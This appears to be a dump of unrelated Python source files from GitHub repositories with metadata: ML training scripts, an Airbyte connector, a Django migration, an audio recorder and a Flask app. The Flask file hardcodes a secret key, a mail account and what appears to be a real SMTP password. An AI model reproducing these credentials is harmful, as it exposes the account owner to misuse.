raise RepositoryError(e)
if response.status_code in (401, 403):
self._log(
"Authorization error accessing {url}".format(url=url), level="warn"
)
return
return Page(url, response.content, response.headers)
|
[
"clint93@Atlabs-MacBook-Pro.local"
] |
clint93@Atlabs-MacBook-Pro.local
|
81467d83f2f1731e28f4172b5b99dae116ba72e8
|
3235d5de705b99ccf983fad5eb72208d1fdc08a1
|
/torch_codes/training.py
|
2da884ad18f536dfabe3a26fb93f58ca8d1323d0
|
[] |
no_license
|
TeCSAR-UNCC/ScalableTracking
|
d0e85aa89dcfa6ea107efb74f8b92e0edd6f2af8
|
21fe38c547e1430d26b7bc82afc74fc60219583d
|
refs/heads/master
| 2020-04-25T17:40:30.638974
| 2019-02-28T01:49:48
| 2019-02-28T01:49:48
| 172,957,370
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,927
|
py
|
from __future__ import print_function
import numpy as np
import random
import os.path
import datetime
import utils
import random
import torch
import torch.nn as nn
import torch.optim as optim
''' Device configuration '''
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
''' HYPERPARAMETERS'''
num_steps = 6
input_size = 54
hidden_size = 64
num_layers=1
num_classes = 4
batch_size = 1
epoches = 50
learning_rate = 0.000001
num_videos = 64
path_to_data = sorted(os.listdir('../duke_dataset/training/'))
class RNN(nn.Module):
def __init__(self, input_size, hidden_size, num_layers, num_classes):
super(RNN, self).__init__()
self.hidden_size = hidden_size
self.num_layers = num_layers
self.lstm = nn.LSTM(input_size, hidden_size,num_layers, batch_first=True)
self.fc = nn.Linear(hidden_size,num_classes)
def forward(self,input_x):
#Set initial hidden and cell states
h0 = torch.zeros(self.num_layers, input_x.size(0), self.hidden_size).to(device)
c0 = torch.zeros(self.num_layers, input_x.size(0), self.hidden_size).to(device)
#Forward propagate LSTM
#out: tensor of shape (batch_size, seq_length, hidden_size)
out, _ = self.lstm(input_x,(h0,c0))
out = self.fc(out[:,-1,:])
return out
model = RNN(input_size,hidden_size,num_layers,num_classes).to(device)
# Loss and optimizer
criterion = nn.MSELoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
iters = num_videos * epoches
randlist=random.sample(range(0,len(path_to_data),2),num_videos)
for epoch in range(epoches):
cnt=0
for i in (randlist):
#i = i % num_videos
#in ROLO utils file, the sequence for MOT16 starts with 30 Modification 3
[w_img, h_img, sequence_name ]= 1920.0,1080.0,path_to_data[i]
x_path = os.path.join('../duke_dataset/training/', sequence_name) #Modification 4
#x_bbox_path = os.path.join('own_images/training/', sequence_name, 'bbox_video.npy')
y_path = '../duke_dataset/training/'+ sequence_name[:-4]+ '_gt.npy' ##Modification 5
#print y_path
filegt = np.load(y_path)
filefeatures = np.load(x_path)
training_iters = filefeatures.shape[0]
#filebboxes = np.load(x_bbox_path)
print('Sequence '+ sequence_name+' chosen')
id =0
total_loss=0
while id < training_iters- num_steps*batch_size:
# Load training data & ground truth
batch_input = utils.load_openpose_features_train(w_img,h_img,filefeatures , batch_size, num_steps, id) # [num_of_examples, input_size] (depth == 1)
batch_groundtruth = utils.load_openpose_gt_train(w_img,h_img,filegt, batch_size, num_steps, id)
batch_input = np.reshape(batch_input, [batch_size, num_steps, input_size])
batch_input = (torch.from_numpy(batch_input)).to(device)
#print(batch_input, batch_input.shape)
batch_groundtruth = np.reshape(batch_groundtruth, [batch_size, num_classes]) #2*4
batch_groundtruth = (torch.from_numpy(batch_groundtruth)).to(device)
#print(batch_groundtruth , batch_groundtruth.shape)
outputs = model(batch_input)
loss = criterion(outputs,batch_groundtruth)*100
optimizer.zero_grad()
loss.backward()
optimizer.step()
#print(id)
total_loss += loss.item()
id = id +1
print ('Epoch [{}/{}], Video [{}/{}], Loss: {:.6f}'.format(epoch+1, epoches, cnt+1, num_videos, total_loss/id))
print ('\n')
cnt+=1
#print('Sequence '+sequence_name+' done')
if (epoch+1)%10==0:
torch.save(model.state_dict(), 'model1/model_epoch'+str(epoch+1)+'_.ckpt')
#print('Model for epoch '+str(epoch)+' saved')
|
[
"pkulkar7@tecsar-srv2.dyn.uncc.edu"
] |
pkulkar7@tecsar-srv2.dyn.uncc.edu
|
2214dd9351b4d1e273596d7252c5ee446963f6e9
|
69d9848465ad109291bc0619aff8eff64d4677af
|
/runner/DecisionTreeRunner.py
|
e93f1658cbfcc3d6570022fd1fc232f2b5b18b20
|
[] |
no_license
|
mwasif41/LTR-DT-NN-Ensemble
|
cc0c3c9d50fc3d3d00a11d679510245490459a55
|
4b684a69b19085af44d46b52365b1027f48d088a
|
refs/heads/master
| 2022-10-18T16:50:14.274460
| 2020-06-10T18:07:10
| 2020-06-10T18:07:10
| 267,496,855
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 915
|
py
|
from sklearn.model_selection import train_test_split
from util.Utils import read_dataset_as_df
from constant.Constant import DATASET_MQ2008_PATH
from constant.Constant import MQ2008_TSV_FILE_NAME
from model.DecisionTree import DecisionTree
from util.Utils import get_data_params
from util.Utils import calculate_ndcg
from util.Utils import calculate_map
''''
Main Running logic for the Decision tree with out ensemble technique
Dataset : MQ2008
'''
print(":: DT started ::")
df = read_dataset_as_df(DATASET_MQ2008_PATH + MQ2008_TSV_FILE_NAME)
# Dividing the data
train, test = train_test_split(df, test_size=0.7)
train_x, train_y, train_q = get_data_params(train)
test_x ,test_y , test_q = get_data_params(test)
model = DecisionTree(100)
model.fit(train)
pred = model.predict(test)
ndcg = calculate_ndcg(pred, test_y)
mAP = calculate_map(pred, test_y)
print('NDCG For DT :', ndcg)
print('MAP For DT :', mAP)
|
[
"Muhammad_Wasif@gap.com"
] |
Muhammad_Wasif@gap.com
|
d7e1bcee8fd1dcf988ea57fad50f8221522ec18f
|
4d59702f4f06b5a03e82195b68c36e5953a27a03
|
/test.py
|
2ce09b234b1ca702f9a91c789d19cddf7b3b0f16
|
[] |
no_license
|
shenhangke/FlaskLearn
|
e991c7fcd4416db5841e5e5653636734669a2a20
|
29b82bc211a2e70fed9ee3acef276b06ed1639c6
|
refs/heads/master
| 2020-06-14T08:40:41.863462
| 2019-07-05T09:20:07
| 2019-07-05T09:20:07
| 194,962,085
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 454
|
py
|
'''
@File : test.py
@Modify Time @Author @Version @Desciption
------------ ------- -------- -----------
2019-07-01 22:39 shenhangke 1.0 None
---------------------
'''
import os.path
def bytesToStr(bytes):
return str(bytes)
if __name__ == "__main__":
print(os.path.abspath("."))
print(os.path.curdir) # os.path.curdir is .
print(bytesToStr(b'\xa80\xc1fr\xc9\xcb\xf8+\xec\xa8\x85+5\x96u'))
|
[
"shenhangke@shenhangkedeMacBook-Pro.local"
] |
shenhangke@shenhangkedeMacBook-Pro.local
|
e86cc256b8f0b493baf3ed65ab14534719e398e8
|
9156f9c8231c6d44b7499ea77f47d3e1a561da16
|
/api/migrations/0006_auto_20200515_1551.py
|
7e165ad65cb6ae8759d24eeb668a56cab74fbf42
|
[] |
no_license
|
dasari810/csoc-2020-task-3
|
c0ed1965a752f36e644e2d4e030317f5097b2b18
|
04e165a3bf2bac58d072924b14f48cb1c2ff51b2
|
refs/heads/master
| 2022-10-30T23:27:04.932558
| 2020-06-19T06:40:20
| 2020-06-19T06:40:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 486
|
py
|
# Generated by Django 3.0.6 on 2020-05-15 10:21
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0005_auto_20200515_1537'),
]
operations = [
migrations.AlterField(
model_name='collaborate',
name='title',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='task', to='api.Todo'),
),
]
|
[
"dasarimadhava810@gmail.com"
] |
dasarimadhava810@gmail.com
|
4343da0251832c30b4cd846e7e6d7e1cccc17968
|
f6a328e169e7756394bdd642173287f8ee6fdc0f
|
/airbyte-integrations/connectors/source-iterable/source_iterable/api.py
|
0d5f429638886df614ad1d0d53cfda2636ba654a
|
[
"MIT"
] |
permissive
|
nclsbayona/airbyte
|
8b5dc24a949dfa29c523a41400b825cecf34dfbe
|
29c31752bf7842c0b222a74bee2b3fbe5cb39091
|
refs/heads/master
| 2023-04-11T11:25:35.360075
| 2021-04-26T15:21:02
| 2021-04-26T15:21:02
| 361,794,568
| 0
| 0
|
MIT
| 2021-04-26T15:11:05
| 2021-04-26T15:11:04
| null |
UTF-8
|
Python
| false
| false
| 7,772
|
py
|
# MIT License
#
# Copyright (c) 2020 Airbyte
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import json
import urllib.parse as urlparse
from abc import ABC, abstractmethod
from typing import Any, Iterable, Mapping, MutableMapping, Optional, Union
import pendulum
import requests
from airbyte_protocol import ConfiguredAirbyteStream
from base_python import HttpStream
class IterableStream(HttpStream, ABC):
url_base = "https://api.iterable.com/api/"
# Hardcode the value because it is not returned from the API
BACKOFF_TIME_CONSTANT = 10.0
def __init__(self, api_key, **kwargs):
super().__init__(**kwargs)
self._api_key = api_key
@property
@abstractmethod
def data_field(self) -> str:
"""
:return: Default field name to get data from response
"""
def backoff_time(self, response: requests.Response) -> Optional[float]:
return self.BACKOFF_TIME_CONSTANT
def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:
"""
Iterable API does not support pagination
"""
return None
def request_params(self, **kwargs) -> MutableMapping[str, Any]:
return {"api_key": self._api_key}
def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:
response_json = response.json()
yield from response_json.get(self.data_field, [])
class IterableExportStream(IterableStream, ABC):
def __init__(self, start_date, **kwargs):
super().__init__(**kwargs)
self._start_date = pendulum.parse(start_date)
self.stream_params = {"dataTypeName": self.data_field}
cursor_field = "createdAt"
@staticmethod
def _field_to_datetime(value: Union[int, str]) -> pendulum.datetime:
if isinstance(value, int):
value = pendulum.from_timestamp(value / 1000.0)
elif isinstance(value, str):
value = pendulum.parse(value)
else:
raise ValueError(f"Unsupported type of datetime field {type(value)}")
return value
def get_updated_state(self, current_stream_state: MutableMapping[str, Any], latest_record: Mapping[str, Any]) -> Mapping[str, Any]:
"""
Return the latest state by comparing the cursor value in the latest record with the stream's most recent state object
and returning an updated state object.
"""
latest_benchmark = self._field_to_datetime(latest_record[self.cursor_field])
if current_stream_state.get(self.cursor_field):
return {self.cursor_field: str(max(latest_benchmark, self._field_to_datetime(current_stream_state[self.cursor_field])))}
return {self.cursor_field: str(latest_benchmark)}
def request_params(self, stream_state: Mapping[str, Any], **kwargs) -> MutableMapping[str, Any]:
params = super().request_params(stream_state=stream_state)
start_datetime = self._start_date
if stream_state.get(self.cursor_field):
start_datetime = pendulum.parse(stream_state[self.cursor_field])
params.update(
{"startDateTime": start_datetime.strftime("%Y-%m-%d %H:%M:%S"), "endDateTime": pendulum.now().strftime("%Y-%m-%d %H:%M:%S")},
**self.stream_params,
)
return params
def path(self, **kwargs) -> str:
return "/export/data.json"
def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:
for obj in response.iter_lines():
yield json.loads(obj)
class Lists(IterableStream):
data_field = "lists"
def path(self, **kwargs) -> str:
return "lists"
class ListUsers(IterableStream):
data_field = "getUsers"
name = "list_users"
def path(self, parent_stream_record, **kwargs) -> str:
return f"lists/{self.data_field}?listId={parent_stream_record['id']}"
def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:
list_id = self._get_list_id(response.url)
for user in response.iter_lines():
yield {"email": user.decode(), "listId": list_id}
@staticmethod
def _get_list_id(url: str) -> int:
parsed_url = urlparse.urlparse(url)
for q in parsed_url.query.split("&"):
key, value = q.split("=")
if key == "listId":
return int(value)
class Campaigns(IterableStream):
data_field = "campaigns"
def path(self, **kwargs) -> str:
return "campaigns"
class Channels(IterableStream):
data_field = "channels"
def path(self, **kwargs) -> str:
return "channels"
class EmailBounce(IterableExportStream):
name = "email_bounce"
data_field = "emailBounce"
class EmailClick(IterableExportStream):
name = "email_click"
data_field = "emailClick"
class EmailComplaint(IterableExportStream):
name = "email_complaint"
data_field = "emailComplaint"
class EmailOpen(IterableExportStream):
name = "email_open"
data_field = "emailOpen"
class EmailSend(IterableExportStream):
name = "email_send"
data_field = "emailSend"
class EmailSendSkip(IterableExportStream):
name = "email_send_skip"
data_field = "emailSendSkip"
class EmailSubscribe(IterableExportStream):
name = "email_subscribe"
data_field = "emailSubscribe"
class EmailUnsubscribe(IterableExportStream):
name = "email_unsubscribe"
data_field = "emailUnsubscribe"
class MessageTypes(IterableStream):
data_field = "messageTypes"
name = "message_types"
def path(self, **kwargs) -> str:
return "messageTypes"
class Metadata(IterableStream):
data_field = "results"
def path(self, **kwargs) -> str:
return "metadata"
class Templates(IterableExportStream):
data_field = "templates"
template_types = ["Base", "Blast", "Triggered", "Workflow"]
message_types = ["Email", "Push", "InApp", "SMS"]
def path(self, **kwargs) -> str:
return "templates"
def read_stream(
self, configured_stream: ConfiguredAirbyteStream, stream_state: Mapping[str, Any] = None
) -> Iterable[Mapping[str, Any]]:
for template in self.template_types:
for message in self.message_types:
self.stream_params = {"templateType": template, "messageMedium": message}
yield from super().read_stream(configured_stream=configured_stream, stream_state=stream_state)
def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:
response_json = response.json()
yield from response_json.get(self.data_field, [])
class Users(IterableExportStream):
data_field = "user"
cursor_field = "profileUpdatedAt"
|
[
"noreply@github.com"
] |
nclsbayona.noreply@github.com
|
330c03ce5ccddcd902120b930900178002d5f97a
|
94e7edd5255ca90f8149f160660925db82187aa1
|
/pyaudi.py
|
37fbf1c15cc33682aeab97f324afedf8bbb94c04
|
[] |
no_license
|
FelipeRMG/Teste
|
a1ea289c8c43d0ca65967e3fa62abcb9b5bb5a8d
|
20266d6d60b9b1907955f6304b61afa649d8e215
|
refs/heads/master
| 2021-01-09T20:05:37.838644
| 2016-07-29T04:50:07
| 2016-07-29T04:50:07
| 63,440,528
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,136
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# utilizado para gravar o audio
import pyaudio
import wave
CHUNK = 1024 #Frames por segundo
FORMAT = pyaudio.paInt16 #Formato do audio
CHANNELS = 2 #1 canal: mono - 2 canais: stereo
RATE = 44100 #taxa de amostragem em hertz
RECORD_SECONDS = 5 #tempo de gravação em segudos
WAVE_OUTPUT_FILENAME = "output.wav" #arquivo de saída de audio
#cria a instância do pyaudio
p = pyaudio.PyAudio()
#configura a stream para gravar o audio
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
print("* recording")
frames = []
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
print("* done recording")
stream.stop_stream()
stream.close()
p.terminate()
#configura as características do arquivo de audio
# print frames
wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
wf.close()
|
[
"noreply@github.com"
] |
FelipeRMG.noreply@github.com
|
38fff3cdd9e08c7ee8f2f9c4b19e664f4e00e700
|
72612d94e07649586dda53c94a058a26af5ed3e6
|
/amr_maldi_ml/deprecated/label_permutation.py
|
cb9f7594dc820409c80b262333e666e4b898d4d3
|
[
"BSD-3-Clause"
] |
permissive
|
SanmiAndreSofa/maldi_amr
|
91e88d0a23d2cb1e5007f73a8ba04be6828d6b6e
|
cc084d73a2d14c5936878e609f6d44fad0b524c7
|
refs/heads/master
| 2023-08-06T10:26:58.989597
| 2021-10-04T09:12:05
| 2021-10-04T09:12:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,983
|
py
|
"""Analylse label-permuted species--antibiotic combinations."""
import argparse
import dotenv
import json
import logging
import pathlib
import os
import numpy as np
from maldi_learn.driams import DRIAMSDatasetExplorer
from maldi_learn.driams import DRIAMSLabelEncoder
from maldi_learn.driams import load_driams_dataset
from maldi_learn.utilities import stratify_by_species_and_label
from models import run_experiment
from utilities import generate_output_filename
dotenv.load_dotenv()
DRIAMS_ROOT = os.getenv('DRIAMS_ROOT')
# These parameters should remain fixed for this particular
# experiment. We always train on the same data set, using
# *all* available years.
site = 'DRIAMS-A'
years = ['2015', '2016', '2017', '2018']
def _run_experiment(
root,
fingerprints,
species,
antibiotic,
corruption,
seed,
output_path,
force,
model,
n_jobs=-1
):
"""Run a single experiment for a given species--antibiotic combination."""
driams_dataset = load_driams_dataset(
root,
site,
years,
species=species,
antibiotics=antibiotic, # Only a single one for this run
encoder=DRIAMSLabelEncoder(),
handle_missing_resistance_measurements='remove_if_all_missing',
spectra_type='binned_6000',
)
logging.info(f'Loaded data set for {species} and {antibiotic}')
# Create feature matrix from the binned spectra. We only need to
# consider the second column of each spectrum for this.
X = np.asarray([spectrum.intensities for spectrum in driams_dataset.X])
logging.info('Finished vectorisation')
corrupted_indices = driams_dataset.y.sample(
frac=corruption,
replace=False,
random_state=args.seed,
).index.values
driams_dataset.y.loc[corrupted_indices, antibiotic] = \
1.0 - driams_dataset.y.loc[corrupted_indices, antibiotic]
# Stratified train--test split
train_index, test_index = stratify_by_species_and_label(
driams_dataset.y,
antibiotic=antibiotic,
random_state=seed,
)
logging.info('Finished stratification')
# Create labels
y = driams_dataset.to_numpy(antibiotic)
X_train, y_train = X[train_index], y[train_index]
X_test, y_test = X[test_index], y[test_index]
# Prepare the output dictionary containing all information to
# reproduce the experiment.
output = {
'site': site,
'seed': seed,
'model': model,
'antibiotic': antibiotic,
'species': species,
'years': years,
}
output_filename = generate_output_filename(
output_path,
output,
suffix=f'corruption_{corruption:.02f}'.replace('.', '_'),
)
output['corruption'] = corruption
# Add fingerprint information about the metadata files to make sure
# that the experiment is reproducible.
output['metadata_versions'] = fingerprints
# Only write if we either are running in `force` mode, or the
# file does not yet exist.
if not os.path.exists(output_filename) or force:
n_folds = 5
results = run_experiment(
X_train, y_train,
X_test, y_test,
model,
n_folds,
verbose=True,
random_state=seed,
)
output.update(results)
logging.info(f'Saving {os.path.basename(output_filename)}')
with open(output_filename, 'w') as f:
json.dump(output, f, indent=4)
else:
logging.warning(
f'Skipping {output_filename} because it already exists.'
)
if __name__ == '__main__':
# Basic log configuration to ensure that we see where the process
# spends most of its time.
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(message)s'
)
parser = argparse.ArgumentParser()
parser.add_argument(
'-a', '--antibiotic',
type=str,
required=True,
help='Antibiotic for which to run the experiment'
)
parser.add_argument(
'-s', '--species',
type=str,
required=True,
help='Species for which to run the experiment'
)
parser.add_argument(
'-c', '--corruption',
type=float,
required=True,
help='Fraction of corrupted labels; must be between [0,1]'
)
parser.add_argument(
'-S', '--seed',
type=int,
required=True,
help='Random seed to use for the experiment'
)
parser.add_argument(
'-m', '--model',
default='lr',
help='Selects model to use for subsequent training'
)
name = 'label_permutation'
parser.add_argument(
'-o', '--output',
default=pathlib.Path(__file__).resolve().parent.parent / 'results'
/ name,
type=str,
help='Output path for storing the results.'
)
parser.add_argument(
'-f', '--force',
action='store_true',
help='If set, overwrites all files. Else, skips existing files.'
)
args = parser.parse_args()
# Create the output directory for storing all results of the
# individual combinations.
os.makedirs(args.output, exist_ok=True)
logging.info(f'Site: {site}')
logging.info(f'Years: {years}')
logging.info(f'Seed: {args.seed}')
logging.info(f'Corruption: {args.corruption:.02f}')
explorer = DRIAMSDatasetExplorer(DRIAMS_ROOT)
metadata_fingerprints = explorer.metadata_fingerprints(site)
# How many jobs to use to run this experiment. Should be made
# configurable ideally.
n_jobs = 24
_run_experiment(
explorer.root,
metadata_fingerprints,
args.species,
args.antibiotic,
args.corruption,
args.seed,
args.output,
args.force,
args.model,
n_jobs
)
|
[
"bastian.rieck@bsse.ethz.ch"
] |
bastian.rieck@bsse.ethz.ch
|
0d5144714bd9cd05c3c1b586657445ed67624e6f
|
54d11cd21a9a3db41cb94f12edbd0f56596d1471
|
/Exercises1/Q1.py
|
5c70753aa301f4aa0efa1514d16c2a134cfdee79
|
[] |
no_license
|
BrunoCaputo/ac309-pyExercises
|
237fae143842a8dac56cedbeb8f855d8da5b358f
|
4a0f0f39ce0f26d84f3517ff6910c4ab30c982e6
|
refs/heads/master
| 2022-10-01T15:33:36.666241
| 2020-06-08T12:00:45
| 2020-06-08T12:00:45
| 261,155,868
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
# Faça um programa que leia algo do teclado e mostre se o conteúdo é formado por letras,
# números ou caracteres alfanuméricos
inp = input("Entre com alguma coisa: ")
if inp.isnumeric():
print("A entrada é formada por apenas números!")
elif inp.isalpha():
print("A entrada é formado por apenas letras!")
elif inp.isalnum():
print("A entrada é formada por números e letras!")
|
[
"brunocaputo@gec.inatel.br"
] |
brunocaputo@gec.inatel.br
|
aa910671713e529e8fa39e8d66ebc8311966c900
|
5e277a32c166ae45bea28310074dc459a0d99cf6
|
/.metadata/.plugins/org.eclipse.core.resources/.history/c5/c0147c8c62a000161648cad84bf61dd0
|
444fd7f9be517480124d9247526cf66939d62057
|
[] |
no_license
|
vgvcode/pos
|
4d7172d7905f60157fcae445c650475d17a9a390
|
a9dba2c5c3fc8c4529c6619a3dc92c9608a4c70d
|
refs/heads/master
| 2021-01-13T13:12:37.833510
| 2016-11-02T22:28:42
| 2016-11-02T22:28:42
| 72,686,364
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,996
|
#!/usr/bin/python
from __future__ import print_function # Python 2/3 compatibility
from decimal import *
import ordersmodule
import catalogmodule
import commonmodule
import sys
import time
from boto3.dynamodb.conditions import Key, Attr
import sqsmodule
import random
import json
def testCreateRemoteCatalog():
'create a list of items and add them one by one'
items = [
{"itemId" : '100', "itemName": 'IDLI', "price": 20},
{"itemId" : '101', "itemName": 'DOSA', "price": 22},
{"itemId" : '102', "itemName": 'VADA', "price": 18},
{"itemId" : '103', "itemName": 'POORI', "price": 25},
{"itemId" : '104', "itemName": 'PONGAL', "price": 27},
{"itemId" : '105', "itemName": 'CHAPPATHI', "price": 15},
{"itemId" : '106', "itemName": 'NOODLES', "price": 20},
{"itemId" : '107', "itemName": 'MEALS', "price": 30},
{"itemId" : '108', "itemName": 'CHAAT', "price": 24},
{"itemId" : '109', "itemName": 'BATURA', "price": 32}
]
#create a remote catalogmodule.Catalog
cat = catalogmodule.Catalog("SRC_CAT100", endpoint="https://dynamodb.us-east-1.amazonaws.com")
cat.createTable()
print('Created schema in remote db')
#add items to the remote catalogmodule.Catalog
#delay a few seconds
print('Waiting for resource to be available...')
time.sleep(30)
for i in items:
cat.addItem(i['itemId'], i['itemName'], i['price'])
def testFetchRemoteCatalog():
cat = catalogmodule.Catalog("SRC_CAT100", endpoint="https://dynamodb.us-east-1.amazonaws.com")
cat.fetchFromDB()
cat.print()
def testFetchLocalCatalog():
cat = catalogmodule.Catalog("SRC_CAT100", endpoint="http://localhost:8000")
cat.fetchFromDB()
cat.print()
def testFetchAllOrders(posId):
os = ordersmodule.OrderTable()
r = os.fetchForPos(posId)
for itm in r["Items"]:
print(itm)
print("Total orders:{}".format(len(r["Items"])))
#createordersmodule.OrderQueues()
#testCreateRemoteCatalog()
#Create the order table
#os = ordersmodule.OrderTable(endpoint = ep)
#os.createTable()
#Create the order queues
#oq = ordersmodule.OrderQueues()
#oq.makeQueues()
#Get orders made in X days
#r = getOrdersMadeInXDays(posId, 1)
#print("Orders made in the last 1 day")
#for o in r['Items']:
# print(o['PosID'], ":", o['OrderID'], o['Info'])
#testCopyRemoteCatalogToLocal(catId)
#c = catalogmodule.Catalog(catId)
#r = c.fetchItemFromDB('102')
#print(r)
#c.print()
#print(c.getItems()['100'])
#Place a few orders
#for i in [1,2,3]:
# o = ordersmodule.Order(posId)
# o.addItem(c.getItems()['103'], i)
# o.addItem(c.getItems()['104'], i)
# o.saveToDB()
# #o.print()
#ot = ordersmodule.OrderTable()
#ot.deQueueOrdersToRemote('insert', 'https://dynamodb.us-east-1.amazonaws.com')
#Initialization
posId = 'PosGNChettyRoadCafe'
catId = 'SRC_CAT100'
ep = "http://localhost:8000"
remoteEp = "https://dynamodb.us-east-1.amazonaws.com"
lCat = catalogmodule.Catalog(catId)
if lCat.copyFromRemote(remoteEp) == False:
print("Remote copy failed")
SystemExit()
print('Copied remote catalog to local')
items = lCat.getItems()
print(items)
"""
for i in range(1,2):
print('Placing order number:{}'.format(i))
o = ordersmodule.Order(posId)
numItems = int(random.random() * 9 + 1)
print("Number of items:{}".format(numItems))
for j in range(1, numItems+1):
itemNumStr = str(100 + int(random.random() * 10))
itemQty = int(random.random() * 19 + 1)
o.addItem(items[itemNumStr], itemQty)
o.writeToFile("orders.txt")
if o.saveToDB() == True:
print("Order saved successfully")
else:
print("Order not saved")
time.sleep(10)
o.addItem(items['105'], 105)
if o.updateToDB() == True:
print("Order updated successfully")
else:
print("Order not updated")
del o
ot = ordersmodule.OrderTable()
ot.deQueueOrdersToRemote('insert', remoteEp)
print('Dequeued all insert orders to remote DB')
time.sleep(10)
ot = ordersmodule.OrderTable()
ot.deQueueOrdersToRemote('update', remoteEp)
print('Dequeued all update orders to remote DB')
"""
"""
o = ordersmodule.Order(posId)
orderId = "2c5f7858-9ef6-11e6-ab7c-9801a7a7a649"
o.fetchFromDB(orderId)
o.print()
o.deleteFromDB()
time.sleep(10)
ot = ordersmodule.OrderTable()
ot.deQueueOrdersToRemote('delete', remoteEp)
print('Dequeued all delete orders to remote DB')
numSeconds = 600
r = commonmodule.getOrdersMadeInXSeconds(posId, numSeconds)
listOfOrders = r['Items']
listOfOrdersByTime = sorted(listOfOrders, key=lambda order: order['Info']['CreatedTicks'])
print('Number of orders made in the last {} seconds: {}'.format(numSeconds, len(r['Items'])))
for oDict in listOfOrdersByTime:
oObj = ordersmodule.Order(posId)
oObj.fromDictionary(oDict)
print("New Order:")
oObj.print()
"""
|
[
"vgvcode@gmail.com"
] |
vgvcode@gmail.com
|
|
ccdeb88d110dbde58c2ab981827125e6f92f6199
|
44a9e63ceaf6d901130afb9c390288dea26b22f3
|
/application.py
|
e7bdff054a89eda437923248e9d7918a9935cf42
|
[] |
no_license
|
Dragon-yy/chat_encryption
|
69558870e11eaf3d45b430db9ebbeba651b47364
|
a8285b3e94e496df8f37b8221c2783f108292a91
|
refs/heads/master
| 2023-01-22T18:26:14.430523
| 2020-11-16T05:14:47
| 2020-11-16T05:14:47
| 313,186,820
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,572
|
py
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_script import Manager
from flask_login import LoginManager
from flask_mail import Mail
from flask_socketio import SocketIO
import os
class Application(Flask):
def __init__(self, import_name, template_folder, static_folder, root_path):
super(Application, self).__init__(import_name,
template_folder=template_folder,
static_folder=static_folder,
root_path=root_path)
# 导入基本配置
self.config.from_pyfile('./config/basic_setting.py')
# 导入个性化配置
if 'ops_config' in os.environ:
self.config.from_pyfile('./config/%s_setting.py' % (os.environ['ops_config']))
self.config['SECRET_KEY'] = '897109005f7b4fa01c9b00775bddecf2'
# 邮箱配置
self.config['MAIL_SERVER'] = 'smtp.qq.com'
self.config['MAIL_PORT'] = 25
self.config['MAIL_USER_TLS'] = True
self.config['MAIL_USERNAME'] = '623852374@qq.com'
self.config['MAIL_PASSWORD'] = 'yutrhsiudilsbdgf'
db.init_app(self)
db = SQLAlchemy()
app = Application(__name__,
template_folder=os.getcwd()+'/web/templates/',
static_folder=os.getcwd()+'/web/static/',
root_path=os.getcwd())
manage = Manager(app)
# 在后端处理各种session
login_manager = LoginManager(app)
# 邮箱用于重置密码
mail = Mail(app)
socketio = SocketIO(app)
|
[
"62385374@qq.com"
] |
62385374@qq.com
|
eba8eeb7aafc225f599c4a18fb2b49e5aea09696
|
9e9efab69604456f51fd4421889ca882638fed7c
|
/hahaha/filehw4.py
|
4800d115c9436c4fdb55a68a85cfbc10573667c8
|
[] |
no_license
|
THACT3001/PhamTienDung-c4t3
|
9374a876d505b8f8353f879f0724837cf0eec0ee
|
9af0e19aa6e81760f22b2c4234a761a8e6c94598
|
refs/heads/master
| 2020-03-19T13:54:59.752331
| 2018-06-22T11:59:06
| 2018-06-22T11:59:06
| 136,600,933
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 43
|
py
|
for i in range(20):
print(i, end = " ")
|
[
"tiendungpham2002@gmail.com"
] |
tiendungpham2002@gmail.com
|
de3ea653be4d4c385315ff2b3e679c3deeb39666
|
953c2daf3f5769858bd1c45f0e3776bc4b34766b
|
/parse_html/wdf.py
|
f51cda19a8b466f62bd1a9acf0ef330833b2e47e
|
[] |
no_license
|
Brian01Chen/PyLearn
|
